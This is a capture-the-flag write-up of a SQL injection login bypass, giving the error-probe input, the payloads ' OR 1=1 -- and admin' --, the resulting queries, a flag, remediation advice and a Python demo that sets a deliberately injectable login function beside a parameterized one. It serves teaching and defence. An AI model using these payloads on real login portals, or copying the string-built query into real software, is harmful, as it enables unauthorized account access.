🚩 Web Exploitation — SQL Injection Bypass

CTF challenge writeup covering SQL injection bypass of authentication, database enumeration, and flag extraction from a vulnerable login portal.

📋 Challenge Description

The challenge presents a login portal for an "Admin Panel" with username and password fields. The hint reads: "Login as admin to get the flag." No source code is provided. The goal is to bypass authentication and retrieve the flag.

Category: Web Exploitation | Difficulty: Easy–Medium | Points: 150

🔍 Step 1 — Reconnaissance

First, I inspected the page source and found a standard HTML login form submitting via POST to /login.php. No JavaScript validation was present. Checking HTTP headers revealed the server was running PHP on Apache.

# Testing with basic injection
Username: admin'
Password: anything

# Server returned a MySQL error — injection confirmed!
# Error: You have an error in your SQL syntax near ''' at line 1

⚙️ Step 2 — Understanding the Query

The backend SQL query likely looks like this:

SELECT * FROM users WHERE username = '$username' AND password = '$password';

Since input is not sanitized, we can inject SQL to manipulate the logic. The goal is to make the WHERE clause always evaluate to TRUE, bypassing password verification.

💥 Step 3 — Exploitation

  1. Injected ' OR '1'='1 in the username field — resulted in an error, quotes are unbalanced.
  2. Tried ' OR 1=1 -- — the -- starts a comment, so the remainder of the query, including the password check, is ignored.
  3. Final payload: admin' -- in the username field, anything in the password field.
  4. The query becomes: SELECT * FROM users WHERE username = 'admin' --' AND password = '...'
  5. Login bypassed — redirected to admin panel with flag exposed!

# Successful payload
Username: admin' --
Password: anything123

# Resulting query (password check commented out):
SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything123';
# ↑ Executed as: SELECT * FROM users WHERE username = 'admin'
# → Returns the admin row → Auth bypass ✓

🚩 Step 4 — Flag Retrieved

After successful authentication bypass, the admin dashboard loaded and displayed the flag:

FLAG: CTF{sql_1nj3ct10n_byp4ss_4uth_ftw}

📸 Screenshots

🌐 [ LOGIN_FORM.png ]
💥 [ INJECTION_PAYLOAD.png ]
🚩 [ FLAG_RETRIEVED.png ]

💡 Lessons Learned / Remediation

  • Always use parameterized queries / prepared statements
  • Validate and sanitize input server-side (client-side checks can be skipped entirely)
  • Use an ORM framework instead of raw SQL (and keep any raw queries it still allows parameterized)
  • Do not return raw database errors to the client — the syntax error in Step 1 is what confirmed the injection
  • Implement WAF rules for common injection patterns
  • Least privilege — DB user should have minimum required rights
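
To make the Step 2 query and the first remediation point concrete, here is an added example (not part of the original writeup) that reproduces the vulnerable string-built query next to its parameterized replacement, using an in-memory SQLite table as a constructed stand-in for the challenge's MySQL backend:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample users table standing in for the challenge's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('guest', 'guest')")
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Mirrors the query reconstructed in Step 2: user input is interpolated straight into SQL."""
    query = (
        f"SELECT * FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError as exc:
        # This is the behaviour seen in Step 1: a lone quote breaks the statement
        # and the raw parser error leaks back to the caller.
        return f"error: {exc}"
    return f"authenticated as {row[0]}" if row else "denied"


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Parameterized form: the driver binds values, so quotes and -- are never parsed as SQL."""
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return f"authenticated as {row[0]}" if row else "denied"


if __name__ == "__main__":
    db = make_db()
    # The writeup's Step 3 payload against both implementations.
    print("vulnerable:", vulnerable_login(db, "admin' --", "anything123"))
    print("safe:      ", safe_login(db, "admin' --", "anything123"))
    # The Step 1 probe: a single quote produces a syntax error only in the vulnerable version.
    print("vulnerable:", vulnerable_login(db, "admin'", "anything"))
    print("safe:      ", safe_login(db, "admin'", "anything"))
```

Against the vulnerable function the payload comments out the password check and returns the admin row; against the parameterized one the same strings are just a non-matching username and password.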

Tools Used
  • Browser DevTools
  • Burp Suite
  • SQLmap (verification)
  • Manual Payloads

Skills Demonstrated
  • SQL Injection
  • Auth Bypass
  • Web Reconnaissance
  • HTTP Analysis
  • Remediation Advice